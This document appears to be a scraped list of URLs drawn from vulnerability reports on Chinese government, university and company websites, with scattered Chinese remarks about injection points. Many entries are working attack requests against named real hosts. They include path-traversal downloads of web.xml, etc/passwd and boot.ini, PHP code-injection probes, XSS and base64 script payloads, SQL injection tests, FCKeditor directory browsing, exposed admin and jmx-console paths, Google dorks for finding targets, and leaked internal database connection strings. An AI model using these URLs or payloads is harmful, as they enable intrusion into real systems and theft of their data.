http://labs.chinamobile.com/events/forum/forum_comment.php http://www.puyang.gov.cn/hdq/xntsa_send.asp?action=add http://www.***.gov.cn/wsjb/visitshow.asp?id=49 http://www.***u.gov.cn/xinfang/visitshow.asp?id=13 http://www.jyj.***.gov.cn/jzxx/visitshow.asp?id=17 http://www.y***.gov.cn/xf/visitshow.asp?id=2 http://www.***l.gov.cn/xzxx/visitshow.asp?id=25 http://www.***.gov.cn/wsxinfang/visitshow.asp?id=130 http://www.q***c.gov.cn/sfwt/visitshow.asp?id=12 http://www.c***du.com/xzxx/visitshow.asp?id=67 http://210.30.***.***9/sos/visitshow.asp?id=14 http://222.90.***.***/jjsh/ts/ruleshow.asp?id=4 http://www.z***.cc/xzmail/visitshow.asp?id=26 http://www.m***.net/zf/visitshow.asp?id=14 http://www.***1.com/mail/visitshow.asp?id=31 http://syesx.***.net/email/visitshow.asp?id=13 http://www.w***zx.com/xzxx/visitshow.asp?id=12 http://w***.***e.com/visitshow.asp?id=23 http://www.cqjjxzfw.gov.cn/application/bszhinan/bszn_sm.jsp?id=27 http://www.cqjjxzfw.gov.cn/application/bszhinan/bszn_sm.jsp?id=27 http://www.iptv-soft.com:8080/cms/web/bbs_news/uploadswf.jsp http://www.zzbtv.com:8080/cms/web/bbs_news/ http://www.xxx.com:8080/cms/conf/system.xml http://www.xxx.com:8080/cms/conf/relatesystem.xml http://www.iptv-soft.com:8080/cms/conf/system.xml http://www.iptv-soft.com:8080/cms/web/jwzt/searcher/config.ini http://www.zzbtv.com:8080/cms/web/jwzt/searcher/config.ini http://www.hxvos.com:8080/cms/web/jwzt/searcherWJkk/config.ini http://www.xygbdst.com:8899/caiji/article.jsp?ac=articleNoticeView&id=70 http://www.hnca.gov.cn/txglj.tar.gz http://smsemp.staff.xdf.cn/xdf/getphoneword http://login.mbaobao.com/user/resetpwd?type=email&__t__=System.mbaobao.getPassword&__e__=9******1%40qq.com&__c__=231135ca-e7f0-418e-9b59-7779ff744acb&__x__=635305213890183927&__ss__=5A69BB723927A5E9E0E1D6BA7A63CCC2 http://gys.hi.chinamobile.com/supplier/viewLogin.action http://www.bjrct.haoyisheng.com/rct/indexgo http://www.shrct.haoyisheng.com/rct/indexgo http://www.xjrct.haoyisheng.com/rct/indexgo http://www.hnrct.haoyisheng.com/rct/indexgo http://www.jsrct.haoyisheng.com/rct/indexgo http://www.bjrct.haoyisheng.com/rct/indexgo为例, http://www.bjrct.haoyisheng.com/rct/pages/regNews.jsp注册帐户 http://ldj.jiangmen.gov.cn/outside/shebk/index.php?controller=Default&action=read&type=22 http://ldj.jiangmen.gov.cn/phpinfo.php http://www.julaa.com/lesson.aspx?keys=% http://forum.h3c.com/forum.php?mod=viewthread&tid=142703&extra= http://www.jzcbank.com/admin/Databackup/3.asp http://127.0.0.1 http://m.bjdxkf10000.com/ http://m.bjdxkf10000.com/info.asp?id=3&info=ji_price http://bbs.lenovomobile.com/LeServiceWebService/Service2.asmx/GetApkVersionJSONByModel http://ns3.tom.com/ http://开头的完整路径,如:http://www.xxx.com/myorder.html ftp://bid2.ha.sgcc.com.cn/ http://dms.jnc.cn:5881/FYSYS/login.action http://ea.bgu.edu.cn/shownews.asp?newsid=1128 http://jxgl.csiic.com/ http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1 http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1 data:text/html;base64,PHNjcmlwdD5hbGVydCgid29veXVufnRlc3QiKTwvc2NyaXB0Pg== http://xzfw.wulian.gov.cn/portal/xzsp_wulianxian/wssb.aspx?orgid=1&org=%e7%bb%bf%e8%89%b2%e9%80%9a%e9%81%93%e5%8a%9e%20 http://xzfw.wulian.gov.cn/portal/xzsp_wulianxian/wssb.aspx?orgid=1&org=%e7%bb%bf%e8%89%b2%e9%80%9a%e9%81%93%e5%8a%9e%20orgid=1 http://xzfw.wulian.gov.cn/qyztc/upload/picnews/jc.asp http://221.179.180.157:8086/WX_MP/index.action?key=11273b38b353c9f011883ee33bd1db7d&key2=W7fbd7022b7c00ee5b69ff2c2e704b858 http://www.siteserver.cn/case/62.html http://www.cctvad.org http://***.gov.cn/admin/upload.jsp http://www.y***.gov.cn:9999/admin/upload.jsp http://www.h***x.gov.cn/admin/upload.jsp http://www.t***.net/admin/upload.jsp http://***w.t***ao.gov.cn/admin/upload.jsp http://www.***.gov.cn/admin/upload.jsp http://www.y***w.gov.cn/admin/upload.jsp http://www.x***x.gov.cn/admin/upload.jsp http://www.w***w.gov.cn/admin/upload.jsp http://www.***p.gov.cn/admin/upload.jsp http://***w.s***u.gov.cn/admin/upload.jsp http://***p.***k.gov.cn:8070/admin/upload.jsp http://218.***.***.19/admin/upload.jsp http://x***.***s.gov.cn/admin/upload.jsp http://www.t***x.com/admin/upload.jsp http://110.7.***.***:8081/admin/upload.jsp http://221.235.***.***/admin/upload.jsp http://www.***.gov.cn:82/web_xzfw/admin/upload.jsp http://www.b***.gov.cn:8092/admin/upload.jsp http://www.y***5.gov.cn:9999/admin/upload.jsp http://***p.***y.gov.cn/admin/upload.jsp http://221.229.***.***/admin/upload.jsp http://www.ciscn.cn/readTeamInfo.action?opt=index&teamid=10904 http://www.ciscn.cn/queryUserInfo.action?opt=selectguid&usertype=1&teamid=10904 http://opac.bgu.edu.cn/opac/item.php?marc_no=0000059842 http://zy.bgu.edu.cn//college/detail/%5c/1.html http://ea.bgu.edu.cn/showsearch.asp http://t.xcb.sdo.com/admincp/ServiceApp.aspx http://t.xcb.sdo.com/admincp/GroupPage.aspx http://opac.bgu.edu.cn/opac/item.php?marc_no=0000059842 http://lib.math.ac.cn:8080/opac/item.php?marc_no=0000018842 http://tsgl.nhic.edu.cn:8080/opac/item.php?marc_no=0000018842 http://202.203.132.134:8080/opac/item.php?marc_no=0000018842 http://lib.math.ac.cn:8080/asord/asord_cls_browse.php?cls_no=A http://210.31.47.7:8080/asord/asorditem.php?asord_marc_no=0003039889 http://lib.math.ac.cn:8080/asord/asord_marc_record.php?cata_no=%E9%AB%98%E6%95%992011 http://mailsubs.zs.gov.cn:88/second/index.php http://duihua.zs.gov.cn:88/view/?ID=98 http://jwc.yangtzeu.edu.cn:8080/serverCFG.TXT http://www.189esy.cn http://www.piao123.com/wzgg.php?id=33 http://tools.xunzai.com/youbian/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/zhongcaoyao/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/jiufang/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/yanfang/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/pianfang/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/mingfang/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/xiehouyu/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/meng/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/miyu/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/yanyu/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/mingyan/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/raokouling/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://www.google.co.in/search?q=inurl:Course_Default.aspx%3Ftypeid%3D&newwindow=1&filter=0&biw=1366&bih=642 http://www.hbdrc.gov.cn/interaction/sewgh-list.jsp?module=Mailbox http://news.tv.china.com/special/newsinfo.php?id=18377274 http://www.m1905.com/special/showForDeveloper.php?specialid=873&tid=1043774 http://www.71school.edu.sh.cn/website/web/jxzy/web/page/index.asp?id=1 http://www.dcnglobal.com/ http://cyjj.bgu.edu.cn/Default.aspx http://125.32.42.242/ http://www.ctsfj.com/info/index.asp?id=1 http://esales.10010.com/就好奇,想弄个账号进去看看 http://esales.10010.com/ http://www.jl.jl.gov.cn/showgg.php?id=36227 http://www.118958.org/ http://61.191.25.187/ http://lolbox.duowan.com/reparieLostPlayer.php?playerName=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E http://lolbox.duowan.com/playerList.php http://edm.m1905.com/.svn/entries http://www.zjxnc.net/admins/ http://yiting.zjxnc.net/admins/ http://yiting.zjxnc.net/includes/cbrChangecun.jsp?dqbh=1 http://yiting.zjxnc.net/includes/rkfzChange.jsp?ssdq=1 http://yiting.zjxnc.net/includes/cbrChange.jsp?sszs=1 http://www.zjxnc.net/includes/uploadFJ.jsp?zd= http://www.o2network.com.cn/news2.php?id=339 http://www.56177.cn/member/login.do url:http://bbs.teamcen.com/thread-3-10.html data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= data:text/html;base64,PHNjcmlwdC9zcmM9aHR0cDovL3QuY24velliWmROZD4= http://www.hot-spring.cn/zixun/show.asp?id=1362&classid=1 http://i.jd.com/trace/share.action?reu=http://www.jd.com/product/837076.html&u=!103!117!106!105!97!110!103!104!117!97!53!55!49!50&t=2&f=7 http://guang.jd.com/user/followUser.action?pinList=ID http://www.tecnova.cn/ http://218.57.137.135:8080/TravelSortInfoSystem/ http://60.216.117.229:8787/TravelSortInfoSystem/ http://www.google.de/#newwindow=1&q=inurl:m%2Fsearch%2Flist.php%3FsiteId%3D http://pop.hengan.com/mail5/jilinbsc.nsf/WebHelp/!OpenPage http://www.bnchina.com:8080/queryUser.do?hongru_username=宽带账号&hongru_accountId=宽带账号 http://wms.orion.com.cn/login.aspx http://wms.orion.com.cn/login.aspx cn:80/webmail/admin/index.php?action=login&module=user&return=/webmail/admin/ http://t9.go2oa.com:86/t9/login.jsp,登陆后,core/funcs/news/show/reNews.jsp页面存在mysql报错注入漏洞,可以获取系统数据信息。 http://school.hi165.com/ http://www.tax.sx.cn/nsfw/list_detail.asp?pid=292 http://m.jd.com/ware/orderCommentDetail/1016853983_1ddff44a-d34b-435c-8047-832de22bb1d8.html?sid=050b68e3ee5e46b1f73f733dac963468 http://bbs.wasu.cn/data/backup_157445/ http://www.sxforest.gov.cn//LeaderDetail.aspx?id=1&type=3 www.cctvad.org//siteserver/platform/background_dbSqlQuery.aspx http://app.migc.xiaomi.com/cms/interface/v5/featured1.php http://42.62.57.16/cms/interface/v5/featured1.php http://42.62.57.15/cms/interface/v5/featured1.php http://www.ziroom.com/?_p=sign&_a=weakpassowrd&step=1&type=forgetpassword http://www.ziroom.com/index.php?_p=api&_a=customer&type=search&login_name=158xxxxxxxx http://www.magtech.com.cn/CN/column/column33.shtml http://www.magtech.com.cn/CN/item/downloadFile.jsp?filedisplay=../../CN/item/downloadFile.jsp http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml http://202.108.154.209/datacenter/# http://202.108.154.209/oa/calendar/exportExcel.do ServicesAudition.asmx/GetRingInfo http://60.13.124.118/OrderRing.aspx?ringNo=9000720120615178827&type=0&ProgCode=0001&Seed=652 http://183.129.160.94/minshen/minshen.rar http://www.sstf.org.cn:8080/kjjr/show/kjpt!list.action http://59.33.44.119:81/boai_booking/index.php?op=booking_step_4 http://www.ppsc.gov.cn/logon.aspx?ReturnUrl=%2fDefault.aspx bt:/pentest/database/sqlmap# http://lanxin.wqapp.cn/a/w/0217/index.html?0211 http://www.weiqunapp.com/pc/index.do http://bureau.cctv.com/register.php,发现是access http://xj.vae.ha.cn/1/tj/stuxj_detail.jsp?editcode=09410105400313 http://app.bgu.edu.cn/docman/login.aspx http://113.105.248.232/ http://www.sxmz.gov.cn/content/topicdeal.jspid=13535&action=read http://ht.52xinyou.cn/xykj/login.aspx http://www.doov.com.cn/)存在dedecms http://news.hitvs.cn/ http://xitong.mingjuan.net/e-learning/listkaoshi2.asp?jiluid=283 http://60.10.25.13/www/ http://60.10.25.13/www/item_seach.php?field=plan_money&keywords=&order=desc&style=&town=&unit_id=&village= http://www.leesuntech.com/ http://www.leesuntech.com/demo http://www.leesuntech.com/demo/admin/ http://www.9you.com/o2xiaoshou/o2xiaoshou.rar http://gg.9you.com/9you.tar.gz http://www.fjetc.gov.cn/cszy/cs/index.aspx?ID=143 http://218.107.217.40/系统 http://219.142.70.6/ http://219.142.70.7:8080/ http://219.142.70.7:8080/arsys/ http://wooyun.org/bugs/wooyun-2010-030714,为毛这个没弱口令T_T) http://chl.vastpay.cn/main.action http://www.cumtyc.com.cn/ http://hkfw.kknk.cn/xm.asp http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml http://vip.cntv.cn/ http://www.gzyb.com.cn:8080/GZYBWeb/login.action http://www.chinamcom.com/ http://www.kuaipan.cn/account_mobileReset.htm www.kuaipan.cn http://www.kuaipan.cn User:Password http://115.236.16.24/phpmyadmin/ http://www.shanghaitech.edu.cn/ORA_NewsMore.asp?tid=7 http://www.shanghaitech.edu.cn/ORA_NewsMore.asp?tid=7%20and%201=1 http://www.shanghaitech.edu.cn/ORA_NewsMore.asp?tid=7%20and%201=2 http://www.jxys.gov.cn/sale.asp?TaskNo=001008 http://www.tgps.cn/logoff_submit.do http://60.195.250.101:89/pgps/system/loginAction_execute.action http://vip4.exlive.cn/synthReports/home/homeAction_mgrLogin.action http://www.fjaudit.gov.cn/zfgd.aspx?p=1&ctlgid=82583512 http://ht.51book.com/login.htm http://weibo.com/u/3022690473/# http://www.nari-relays.com/ru/nr_shownews.php?id=86 Url:http://www.90619.com/ com:8088 http://www.bpeg.nc.sgcc.com.cn http://www.bpeg.nc.sgcc.com.cn/ww/contenttest.asp?newsisold=0&newsid=&newsformid=XXFBDTP&newssheetno=1402270004 http://www.bpeg.nc.sgcc.com.cn/ww/searchupdate http://211.160.72.252/special/index.php?sid=1 Url:http://www.ceppbooks.sgcc.com.cn Url:http://sxk.ceppbooks.com/user/ http://www.mailer.com.cn/New%20Customers/index1.htm http://mail.njzj.gov.cn:8080 http://61.155.50.151 http://mail.lyx928.com:8080 http://mail.shszx.gov.cn:8600 http://mail.censoft.com.cn http://mail.ascentgolden.com:8080 http://61.155.50.151 http://mail.lyx928.com:8080 http://mail.censoft.com.cn为例,作全程解说。 http://mail.censoft.com.cn/tmw/211ede8H38f/mailmain?type=msaveuser http://www.4007123123.com/userhome/ajax/getaddressbase.aspx?cityid=1存在sql注入 http://www.hljsjjy.com/listzt.asp?id=520 http://tmoa.stdu.edu.cn/webpages/login.aspx http://www.36kr.com/p/210505.html),号称可以“可直接连接储蓄卡网银解析账单,突破以往只能解析信用卡账单的限制”,作为每看到新产品都想跃跃欲试的偶,觉得安全问题才是我考虑的重中之重! m.laiwang.com/go/market/channel_landing_page2.php?ci= inurl:ACTIONSHOWNEWS inurl:ACTIONSHOWNEWS.APPPROCESS http://jw.***.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=261 http://jwcweb.***u.edu.cn:7001/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1361 http://***c.com/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1521 http://ea.***m.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=2381 http://edu.***c.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=4023 http://218.61.***.***/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=124 http://jwc.***.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1081 http://211.82.***.***:8000/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=244 http://jiaowu.***.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=410 http://www1.***y.com/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=181 http://www.***y.com:8080/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=61 http://cityjw.***.edu.cn:7001/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=163 http://121.22.***.***/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=270 http://218.7.***.***:800/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=61 http://202.97.***.***:8000/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1241 http://202.119.***.***:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436 http://jwk.d***.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=482 http://gz.s***.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=301 http://jwgl.***u.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=461 http://59.73.***.***/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=563 http://123.233.***.***:8080/index.jsp http://218.8.**.***:8888/ACTIONSHOWFILES.APPPROCESS?mode=1 http://202.198.***.***/ http://221.211.***.***/ACTIONSHOWFILES.APPPROCESS?mode=1 http://202.***.***.***:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436 http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436 http://edu.***.com/Main.jsp http://sysjk.ivdc.gov.cn:8081/cx/ cn:8081/cx/querysyjdcjjg/querysyjdcjjg.do http://www.jxmtdzj.com/temp.php?pid=18&dir=190 http://px1624ts.blog.163.com/blog/static/2080002552012594726428/ http://192.168.1.1/GateWay/RosApi.asmx http://192.168.1.1/GateWay/RosApi.asmx?op=CheckLoginUser http://192.168.1.1/GateWay/RosApi.asmx?op=SetUserOffLine http://www.bnu1.org/ http://dj.cnr.cn/administrator http://cn.astercc.org/2009/01/07/astercc-box-01-iso-%E5%8F%91%E5%B8%83.html http://cn.astercc.org/2009/01/wp-content/uploads/2009/01/freepbx_cn.png cn.astercc.org/webshell.php trac.astercc.com/asterCC/conf/trac.ini org:astercc.org:e5c8709df07039c4243a1b838cfefbbe org:astercc.org:fcdfb0298b99af0aec7be800cf288cce org:astercc.org:b99a13e9b8d25f6e93f8cf019d360c33 org:astercc.org:b19adf580bc884716d15a8c3db1d0350 6.trac.astercc.com/asterCC/db发现了一些东西 http://www.lxcourt.gov.cn/show_class.php?id=1150 http://test.spider.com.cn:8060/jmx-console/ http://www.whxzfw.gov.cn/index/showIndex.action www.whxzfw.gov.cn/index/downLoadFile.action?fileName=1-1%B9%AB%B9%B2%B3%A1%CB%F9%CE%C0%C9%FA%D0%ED%BF%C9%C9%EA%C7%EB%CA%E9%CA%BE%B7%B6%CE%C4%B1%BE.doc&filePath=WEB-INF/web.xml http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_3.xsd jdbc:jtds:sqlserver://192.168.168.8:1433/webroot_wh;charset=gbk;SelectMethod=CURSOR http://www.whxzfw.gov.cn:8000/oa http://www.whxzfw.gov.cn/xzfw http://www.whxzfw.gov.cn/xzfw/netLogin.action http://www.whxzfw.gov.cn:8000/xzjc http://localhost/xzfw/ApplicationDataService.jws http://www.hbxzzx.gov.cn/index/showIndex.action www.hbxzzx.gov.cn/index/downLoadFile.action?filePath=WEB-INF/web.xml http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_3.xsd jdbc:jtds:sqlserver://192.168.0.252:1433/hb_web;charset=gbk;SelectMethod=CURSOR jdbc:oracle:thin:@192.168.0.47:1521:fstest http://192.168.0.31:8080/xzfw_yidu_ok/ApplicationDataService.jws http://www.xfxzfw.gov.cn:8080/index/showIndex.action http://www.xfxzfw.gov.cn:8080/index/downLoadFile.action?fileName=&filePath=WEB-INF/web.xml http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_3.xsd jdbc:jtds:sqlserver://127.0.0.1:1433/web_xf;charset=gbk;SelectMethod=CURSOR jdbc:jtds:sqlserver://127.0.0.1:1433/web_xf;charset=gbk;SelectMethod=CURSOR http://119.36.79.214:8080/xzfw/ApplicationDataService.jws http://219.139.28.8:8880/ybgy http://119.36.79.214:8080/xzfw/staticBLWorkFlow.action?caseid=&workflowid= http://110.7.48.79:8081/index/showIndex.action http://110.7.48.79:8081/index/downLoadFile.action?fileName=&filePath=WEB-INF/web.xml http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_3.xsd jdbc:jtds:sqlserver://192.168.1.2:1433/xzfwweb;charset=gbk;SelectMethod=CURSOR http://localhost/xzfw/ApplicationDataService.jws http://61.157.144.79/Public/SzxyPortal/loginForm.jsp http://61.157.144.79/wfJSP/virtualDisk/issuance/fileTextEdit.jsf?folderType=release&folderPath=../../../../&fileName=etc/passwd http://www.hdqqx.cn/ly/admin/qwbm_index.asp http://1000bank.com/other/about.action http://1000bank.com/other/news.action http://wooyun.org/bugs/wooyun-2014-048789 http://111.13.55.55/webmanage/index1.jsp http://www.360class.cn http://www.360class.cn/cus/cusweb!isLogin.action http://jjgl.bjmu.edu.cn/ci/web.temp.index.do http://jjgl.bjmu.edu.cn/ci/website.show.do?m=s&show.form.iid=15 http://jjgl.bjmu.edu.cn/app/webstudent_prjact.form.do?paid=1231 http://www.chinaamc.com/zcms/Services/Activity/universal/S_page_ztc_lb.jsp?catalogid=105766 http://news.sau.edu.cn/ inurl:eeoa/login.jsp http://120.193.248.122/eeoa/registerRegisterAction.action http://www.nj29jt.net:98/eeoa/registerRegisterAction.action http://threeoa.dhu.cc/eeoaftp/downloadFile.action?path=/index.jsp http://threeoa.dhu.cc/eeoaftp/downloadFile.action?path=/WEB-INF/web.xml http://threeoa1.dhu.cc/bl/space?uuid=cefa9799e7cd1ee8dc40bb1bded9a872 http://www.hshsh.pudong-edu.sh.cn/bl/personalMng/image_detail.jsp?imageId=img67000000395 http://www.hshsh.pudong-edu.sh.cn/be/ber_manager_detail.jsp?regionFile=sh&myBer=1&uuid=c0ecc4fd202bd16798bb27dfe9ecffff http://tw.hzau.edu.cn/ http://www.lzws.gov.cn/admin/adminlogin.asp http://www.sqbank.com.cn http://saa.csu.edu.cn/index.html http://yollyah.com/ ftp://yollyah.com/ http://lntgw.lnu.edu.cn/info.php?num=137 http://lntgw.lnu.edu.cn/info.php?num=137 http://lntgw.lnu.edu.cn/info.php?num=137 http://ouya.henu.edu.cn/ https://passport.alipay.com/login/login.htm?return_url=http%3A%2F%2Fmail.aliyun.com%2Falimail%2Fauth%2FcallbackForHavana%3Freurl%3D%252Falimail%252F&fromSite=9,查找DOM可查找到https://img.alipay.com/common/um/lsa.swf?v=1,分析SWF文件可知存在与 http://mail.aliyun.com/ https://jsfile2012.appspot.com/paypalpoc?data= http://61.168.222.157/login.jsp http://202.100.78.35/login.jsp http://202.99.122.144/login.jsp http://116.10.125.143/login.jsp http://118.213.88.17/login.jsp http://221.192.154.15/login.jsp http://117.34.64.100/login.jsp http://218.25.248.50/login.jsp http://222.161.12.130/login.jsp http://115.153.192.2/login.jsp http://xyj.im/xyj.m.html http://yunpan.alibaba-inc.com/ http://bbs.fumu.com/home.php?mod=spacecp http://www.sdxnw.gov.cn/document_show.asp?id=75087&mark=101 http://www.shaoxing.gov.cn/wyztc/proposal/download.action?directory=proposals&fileName=../index.jsp www.ddztb.gov.cn/InfoManage/GetAttachment.aspx?AttachmentTimeName=../../index.aspx&AttachmentName=22.txt www.ddcei.gov.cn/InfoManage/GetAttachment.aspx?AttachmentTimeName=../../index.aspx&AttachmentName=22.txt www.ddfgw.gov.cn/InfoManage/GetAttachment.aspx?AttachmentTimeName=../../index.aspx&AttachmentName=22.txt www.hrbwrb.gov.cn/down.action?attachentName=../dynamicPages/search.jsp https://www.google.com.hk/search?q=ZDSOFT.NET信息发布平台-+++登录&oq=ZDSOFT.NET信息发布平台-+++登录&aqs=chrome..69i57&sourceid=chrome&espv=210&es_sm=91&ie=UTF-8 http://www.l****.cn:8080/jmx-console/ http://www.g***u.gov.cn:8080/jmx-console/ http://www.j***i.net:8080/jmx-console/ http://222.**.***.42:81/jmx-console/ http://www.r**x.com:8080/jmx-console/ http://j***i.net:8080/jmx-console/ http://218.**.***.5*:8080/jmx-console/ http://wwww.****u.gov.cn:8080/jmx-console/ http://www.smegz.gov.cn/ctiin/share/DownloadFileAction.do?file=index.jsp&name=22.txt http://en.damai.cn/All_Tickets.aspx?key=xmlq58BX http://en.damai.cn/All_Tickets.aspx?key=xmlq58BX http://tuandui.sdta.cn/tourforecast/loginmain.jsp http://wz.investment.gov.cn/SFI/bsAffairdocsAction.do?method=excute&path=WEB-INF/web.xml http://bj.5i5j.com/.svn/entries http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/------------ http://www.maxen.com.cn/dedecms/login.php http://www.maxen.com.cn/plus/show.php www.investbeijing.gov.cn/file.do?fname=../index.jsp www.jxsl.gov.cn/download.jsp?action=download&filename=../../download.jsp http://www.google.com.tw/#newwindow=1&q=inurl:gov.cn+showIssueContentAction.do&start=10 http://www.xinxing.gov.cn/showIssueContentAction.do?jsecuKeyNumberStr=1216454164954&action=downloadFile&path=/website/index.jsp http://www.yunfu.gov.cn/showIssueContentAction.do?jsecuKeyNumberStr=1216454164954&action=downloadFile&path=/website/index.jsp http://sp.yulin.gov.cn/showIssueContentAction.do?jsecuKeyNumberStr=1216454164954&action=downloadFile&path=/website/index.jsp http://www.yfga.gov.cn/showIssueContentAction.do?jsecuKeyNumberStr=1216454164954&action=downloadFile&path=/website/index.jsp http://www.yfxjxq.gov.cn/showIssueContentAction.do?jsecuKeyNumberStr=1216454164954&action=downloadFile&path=/website/index.jsp www.jieyang.gov.cn/Worker.ashx?action=getatt&fp=../../view.aspx jd.nbfz.gov.cn/adminlaw/site_backup.jsp?action=download&filename=c:/boot.ini http://www.yyzwfw.gov.cn/index/downLoadFile.action?filePath=index.jsp&fileName=11.txt Url:http://www.wandaperformance.com/user.do?parameter=password www.cast.gov.cn/admin/index.php?controller=BoProducts&action=DownFile&file_source_name=11.txt&file_record_name=../../public/english/index.php http://ir.anta.com http://ir.anta.com/mobile/html/report.php?year=2013依然存在注入 http://www.hdws.gov.cn/download.php?id=../download.php http://www.google.com.tw/search?q=inurl:do_download.jsp&newwindow=1&noj=1&ei=kv0qU-bCK6WpiAeBy4CADA&start=40&sa=N&biw=1920&bih=760 www.gxhzgjj.com/do_download.jsp?id=../index.jsp gtj.heyuan.gov.cn/do_download.jsp?path=\index.jsp www.gdyc.gov.cn/jsp/do_download.jsp?path=\jsp\news.jsp www.dxalxzfwzx.gov.cn/home/do_download.jsp?url=/index.jsp www.fwzx-dhp.gov.cn/setting/download/do_download.jsp?url=/index.jsp http://www.hbcy.gov.cn/application/bgxz/download.jsp?filename=F:/web_changyang/public_html//application/index.jsp http://wow.tgbus.com/ http://kurei.cn/index.html http://www.google.de/#newwindow=1&q=inurl:Announce%2Fthread-79.html http://rzzx.kingdee.com http://rzzx.kingdee.com http://www.japrtc.gov.cn/new_info_dowload.jsp?wj=/index.jsp http://www.japrtc.gov.cn/new_info_dowload.jsp?wj=/new_info_dowload.jsp http://www.jshrss.gov.cn/Auditing/download.jsp?filename=../download.jsp http://kefuzhaopinwang.com/admin/admin_login.php?act=login http://www.futizaixian.com/Trade/Dlt/Project_Info.html?id=114111 http://nauce.nau.edu.cn/portal/ http://nauce.nau.edu.cn/learning/simple_forum/list.jsp?forum_id=online_faq&forum_name=%E7%B3%BB%E7%BB%9F%E4%BD%BF%E7%94%A8%E4%BA%A4%E6%B5%81&is_show=9 http://nauce.nau.edu.cn/learning/client_scripts/ http://www.goodjob100.com/ http://denglish.e21.cn/diag/user_myclazz.do?pageNum=1&pageRows=5&grade=0 http://gdwap.dooland.com/ http://gdwap.dooland.com/b.php?id=8592 http://gdwap.dooland.com/pic.php?pid=98992&page=3&articleid=383661 http://gdwap.dooland.com/s.php?id=4 http://bbs.xingcloud.com/ http://jsxy.nau.edu.cn/web/enrolling/CompReg.aspx http://jsxy.nau.edu.cn/user/eSchool/Student/JobDetail.aspx?JobID=16 http://jsxy.nau.edu.cn/user/auths/index.aspx http://clubclient.qq.com/clubclient_goto.php?uin=63636&key=2724F259C5FB538000EF24D374D60165452526EA51985EE962D5379B4BF4BD30&sendclick=1&qptag=1&statid=10001903&gotourl=http://qzone.qq.com&tipsid=52684&ADUIN=2533750203&ADSESSION=1356685136&ADTAG=CLIENT.QQ.4855_.0&ADPUBNO=26095 http://trip.taobao.com/go/act/other/dxhb2014.php http://www.ommoo.com/admin/index.php?m=Public&a=login````注入在http://www.ommoo.com/u.php?action=prettify&uid=177071这里and inurl:u***es inurl:index.jsp inurl:do***?siteid http://www.wuzhi.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://eqrsj.***.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://www.j***o.jcy.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://www.s***u.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://cjl.***i.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector 